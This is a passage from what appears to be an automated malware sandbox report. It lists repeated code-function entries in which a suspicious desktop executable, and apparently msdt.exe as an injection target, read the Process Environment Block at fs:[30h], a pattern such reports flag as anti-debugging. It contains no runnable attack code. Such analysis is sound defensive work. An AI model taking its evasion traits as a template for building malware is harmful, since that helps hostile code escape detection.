          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01172073 mov eax, dword ptr fs:[00000030h]1_2_01172073
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01181074 mov eax, dword ptr fs:[00000030h]1_2_01181074
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B9080 mov eax, dword ptr fs:[00000030h]1_2_010B9080
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01133884 mov eax, dword ptr fs:[00000030h]1_2_01133884
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01133884 mov eax, dword ptr fs:[00000030h]1_2_01133884
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C849B mov eax, dword ptr fs:[00000030h]1_2_010C849B
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F90AF mov eax, dword ptr fs:[00000030h]1_2_010F90AF
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E20A0 mov eax, dword ptr fs:[00000030h]1_2_010E20A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E20A0 mov eax, dword ptr fs:[00000030h]1_2_010E20A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E20A0 mov eax, dword ptr fs:[00000030h]1_2_010E20A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E20A0 mov eax, dword ptr fs:[00000030h]1_2_010E20A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E20A0 mov eax, dword ptr fs:[00000030h]1_2_010E20A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E20A0 mov eax, dword ptr fs:[00000030h]1_2_010E20A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EF0BF mov ecx, dword ptr fs:[00000030h]1_2_010EF0BF
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EF0BF mov eax, dword ptr fs:[00000030h]1_2_010EF0BF
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EF0BF mov eax, dword ptr fs:[00000030h]1_2_010EF0BF
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114B8D0 mov eax, dword ptr fs:[00000030h]1_2_0114B8D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114B8D0 mov ecx, dword ptr fs:[00000030h]1_2_0114B8D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114B8D0 mov eax, dword ptr fs:[00000030h]1_2_0114B8D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114B8D0 mov eax, dword ptr fs:[00000030h]1_2_0114B8D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114B8D0 mov eax, dword ptr fs:[00000030h]1_2_0114B8D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114B8D0 mov eax, dword ptr fs:[00000030h]1_2_0114B8D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01188CD6 mov eax, dword ptr fs:[00000030h]1_2_01188CD6
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136CF0 mov eax, dword ptr fs:[00000030h]1_2_01136CF0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136CF0 mov eax, dword ptr fs:[00000030h]1_2_01136CF0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136CF0 mov eax, dword ptr fs:[00000030h]1_2_01136CF0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B58EC mov eax, dword ptr fs:[00000030h]1_2_010B58EC
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011714FB mov eax, dword ptr fs:[00000030h]1_2_011714FB
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EA70E mov eax, dword ptr fs:[00000030h]1_2_010EA70E
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EA70E mov eax, dword ptr fs:[00000030h]1_2_010EA70E
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114FF10 mov eax, dword ptr fs:[00000030h]1_2_0114FF10
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114FF10 mov eax, dword ptr fs:[00000030h]1_2_0114FF10
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117131B mov eax, dword ptr fs:[00000030h]1_2_0117131B
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0118070D mov eax, dword ptr fs:[00000030h]1_2_0118070D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0118070D mov eax, dword ptr fs:[00000030h]1_2_0118070D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DF716 mov eax, dword ptr fs:[00000030h]1_2_010DF716
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B4F2E mov eax, dword ptr fs:[00000030h]1_2_010B4F2E
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B4F2E mov eax, dword ptr fs:[00000030h]1_2_010B4F2E
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EE730 mov eax, dword ptr fs:[00000030h]1_2_010EE730
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01188B58 mov eax, dword ptr fs:[00000030h]1_2_01188B58
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BDB40 mov eax, dword ptr fs:[00000030h]1_2_010BDB40
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CEF40 mov eax, dword ptr fs:[00000030h]1_2_010CEF40
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BF358 mov eax, dword ptr fs:[00000030h]1_2_010BF358
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BDB60 mov ecx, dword ptr fs:[00000030h]1_2_010BDB60
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CFF60 mov eax, dword ptr fs:[00000030h]1_2_010CFF60
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01188F6A mov eax, dword ptr fs:[00000030h]1_2_01188F6A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E3B7A mov eax, dword ptr fs:[00000030h]1_2_010E3B7A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E3B7A mov eax, dword ptr fs:[00000030h]1_2_010E3B7A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C1B8F mov eax, dword ptr fs:[00000030h]1_2_010C1B8F
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C1B8F mov eax, dword ptr fs:[00000030h]1_2_010C1B8F
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01137794 mov eax, dword ptr fs:[00000030h]1_2_01137794
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01137794 mov eax, dword ptr fs:[00000030h]1_2_01137794
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01137794 mov eax, dword ptr fs:[00000030h]1_2_01137794
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0116D380 mov ecx, dword ptr fs:[00000030h]1_2_0116D380
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C8794 mov eax, dword ptr fs:[00000030h]1_2_010C8794
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2397 mov eax, dword ptr fs:[00000030h]1_2_010E2397
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117138A mov eax, dword ptr fs:[00000030h]1_2_0117138A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EB390 mov eax, dword ptr fs:[00000030h]1_2_010EB390
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E4BAD mov eax, dword ptr fs:[00000030h]1_2_010E4BAD
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E4BAD mov eax, dword ptr fs:[00000030h]1_2_010E4BAD
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E4BAD mov eax, dword ptr fs:[00000030h]1_2_010E4BAD
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01185BA5 mov eax, dword ptr fs:[00000030h]1_2_01185BA5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011353CA mov eax, dword ptr fs:[00000030h]1_2_011353CA
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011353CA mov eax, dword ptr fs:[00000030h]1_2_011353CA
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DDBE9 mov eax, dword ptr fs:[00000030h]1_2_010DDBE9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E03E2 mov eax, dword ptr fs:[00000030h]1_2_010E03E2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E03E2 mov eax, dword ptr fs:[00000030h]1_2_010E03E2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E03E2 mov eax, dword ptr fs:[00000030h]1_2_010E03E2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E03E2 mov eax, dword ptr fs:[00000030h]1_2_010E03E2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E03E2 mov eax, dword ptr fs:[00000030h]1_2_010E03E2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E03E2 mov eax, dword ptr fs:[00000030h]1_2_010E03E2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F37F5 mov eax, dword ptr fs:[00000030h]1_2_010F37F5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C8A0A mov eax, dword ptr fs:[00000030h]1_2_010C8A0A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BC600 mov eax, dword ptr fs:[00000030h]1_2_010BC600
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BC600 mov eax, dword ptr fs:[00000030h]1_2_010BC600
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BC600 mov eax, dword ptr fs:[00000030h]1_2_010BC600
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E8E00 mov eax, dword ptr fs:[00000030h]1_2_010E8E00
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D3A1C mov eax, dword ptr fs:[00000030h]1_2_010D3A1C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EA61C mov eax, dword ptr fs:[00000030h]1_2_010EA61C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EA61C mov eax, dword ptr fs:[00000030h]1_2_010EA61C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B5210 mov eax, dword ptr fs:[00000030h]1_2_010B5210
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B5210 mov ecx, dword ptr fs:[00000030h]1_2_010B5210
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B5210 mov eax, dword ptr fs:[00000030h]1_2_010B5210
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B5210 mov eax, dword ptr fs:[00000030h]1_2_010B5210
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BAA16 mov eax, dword ptr fs:[00000030h]1_2_010BAA16
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BAA16 mov eax, dword ptr fs:[00000030h]1_2_010BAA16
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171608 mov eax, dword ptr fs:[00000030h]1_2_01171608
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F4A2C mov eax, dword ptr fs:[00000030h]1_2_010F4A2C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F4A2C mov eax, dword ptr fs:[00000030h]1_2_010F4A2C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0116FE3F mov eax, dword ptr fs:[00000030h]1_2_0116FE3F
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BE620 mov eax, dword ptr fs:[00000030h]1_2_010BE620
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117EA55 mov eax, dword ptr fs:[00000030h]1_2_0117EA55
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01144257 mov eax, dword ptr fs:[00000030h]1_2_01144257
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B9240 mov eax, dword ptr fs:[00000030h]1_2_010B9240
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B9240 mov eax, dword ptr fs:[00000030h]1_2_010B9240
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B9240 mov eax, dword ptr fs:[00000030h]1_2_010B9240
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B9240 mov eax, dword ptr fs:[00000030h]1_2_010B9240
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C7E41 mov eax, dword ptr fs:[00000030h]1_2_010C7E41
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C7E41 mov eax, dword ptr fs:[00000030h]1_2_010C7E41
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C7E41 mov eax, dword ptr fs:[00000030h]1_2_010C7E41
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C7E41 mov eax, dword ptr fs:[00000030h]1_2_010C7E41
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C7E41 mov eax, dword ptr fs:[00000030h]1_2_010C7E41
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C7E41 mov eax, dword ptr fs:[00000030h]1_2_010C7E41
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117AE44 mov eax, dword ptr fs:[00000030h]1_2_0117AE44
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117AE44 mov eax, dword ptr fs:[00000030h]1_2_0117AE44
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C766D mov eax, dword ptr fs:[00000030h]1_2_010C766D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F927A mov eax, dword ptr fs:[00000030h]1_2_010F927A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0116B260 mov eax, dword ptr fs:[00000030h]1_2_0116B260
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0116B260 mov eax, dword ptr fs:[00000030h]1_2_0116B260
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01188A62 mov eax, dword ptr fs:[00000030h]1_2_01188A62
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DAE73 mov eax, dword ptr fs:[00000030h]1_2_010DAE73
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DAE73 mov eax, dword ptr fs:[00000030h]1_2_010DAE73
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DAE73 mov eax, dword ptr fs:[00000030h]1_2_010DAE73
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DAE73 mov eax, dword ptr fs:[00000030h]1_2_010DAE73
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DAE73 mov eax, dword ptr fs:[00000030h]1_2_010DAE73
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114FE87 mov eax, dword ptr fs:[00000030h]1_2_0114FE87
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010ED294 mov eax, dword ptr fs:[00000030h]1_2_010ED294
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010ED294 mov eax, dword ptr fs:[00000030h]1_2_010ED294
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B52A5 mov eax, dword ptr fs:[00000030h]1_2_010B52A5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B52A5 mov eax, dword ptr fs:[00000030h]1_2_010B52A5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B52A5 mov eax, dword ptr fs:[00000030h]1_2_010B52A5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B52A5 mov eax, dword ptr fs:[00000030h]1_2_010B52A5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B52A5 mov eax, dword ptr fs:[00000030h]1_2_010B52A5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011346A7 mov eax, dword ptr fs:[00000030h]1_2_011346A7
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CAAB0 mov eax, dword ptr fs:[00000030h]1_2_010CAAB0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CAAB0 mov eax, dword ptr fs:[00000030h]1_2_010CAAB0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01180EA5 mov eax, dword ptr fs:[00000030h]1_2_01180EA5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01180EA5 mov eax, dword ptr fs:[00000030h]1_2_01180EA5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01180EA5 mov eax, dword ptr fs:[00000030h]1_2_01180EA5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EFAB0 mov eax, dword ptr fs:[00000030h]1_2_010EFAB0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E36CC mov eax, dword ptr fs:[00000030h]1_2_010E36CC
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2ACB mov eax, dword ptr fs:[00000030h]1_2_010E2ACB
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F8EC7 mov eax, dword ptr fs:[00000030h]1_2_010F8EC7
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01188ED6 mov eax, dword ptr fs:[00000030h]1_2_01188ED6
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0116FEC0 mov eax, dword ptr fs:[00000030h]1_2_0116FEC0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2AE4 mov eax, dword ptr fs:[00000030h]1_2_010E2AE4
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E16E0 mov ecx, dword ptr fs:[00000030h]1_2_010E16E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C76E2 mov eax, dword ptr fs:[00000030h]1_2_010C76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78CD6 mov eax, dword ptr fs:[00000030h]18_2_04D78CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26CF0 mov eax, dword ptr fs:[00000030h]18_2_04D26CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26CF0 mov eax, dword ptr fs:[00000030h]18_2_04D26CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26CF0 mov eax, dword ptr fs:[00000030h]18_2_04D26CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D614FB mov eax, dword ptr fs:[00000030h]18_2_04D614FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB849B mov eax, dword ptr fs:[00000030h]18_2_04CB849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3C450 mov eax, dword ptr fs:[00000030h]18_2_04D3C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3C450 mov eax, dword ptr fs:[00000030h]18_2_04D3C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA44B mov eax, dword ptr fs:[00000030h]18_2_04CDA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC746D mov eax, dword ptr fs:[00000030h]18_2_04CC746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26C0A mov eax, dword ptr fs:[00000030h]18_2_04D26C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26C0A mov eax, dword ptr fs:[00000030h]18_2_04D26C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26C0A mov eax, dword ptr fs:[00000030h]18_2_04D26C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26C0A mov eax, dword ptr fs:[00000030h]18_2_04D26C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7740D mov eax, dword ptr fs:[00000030h]18_2_04D7740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7740D mov eax, dword ptr fs:[00000030h]18_2_04D7740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7740D mov eax, dword ptr fs:[00000030h]18_2_04D7740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDBC2C mov eax, dword ptr fs:[00000030h]18_2_04CDBC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov ecx, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D58DF1 mov eax, dword ptr fs:[00000030h]18_2_04D58DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]18_2_04CBD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]18_2_04CBD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FDE2 mov eax, dword ptr fs:[00000030h]18_2_04D6FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FDE2 mov eax, dword ptr fs:[00000030h]18_2_04D6FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FDE2 mov eax, dword ptr fs:[00000030h]18_2_04D6FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FDE2 mov eax, dword ptr fs:[00000030h]18_2_04D6FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2581 mov eax, dword ptr fs:[00000030h]18_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2581 mov eax, dword ptr fs:[00000030h]18_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2581 mov eax, dword ptr fs:[00000030h]18_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2581 mov eax, dword ptr fs:[00000030h]18_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDFD9B mov eax, dword ptr fs:[00000030h]18_2_04CDFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDFD9B mov eax, dword ptr fs:[00000030h]18_2_04CDFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD35A1 mov eax, dword ptr fs:[00000030h]18_2_04CD35A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]18_2_04CD1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]18_2_04CD1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]18_2_04CD1DB5
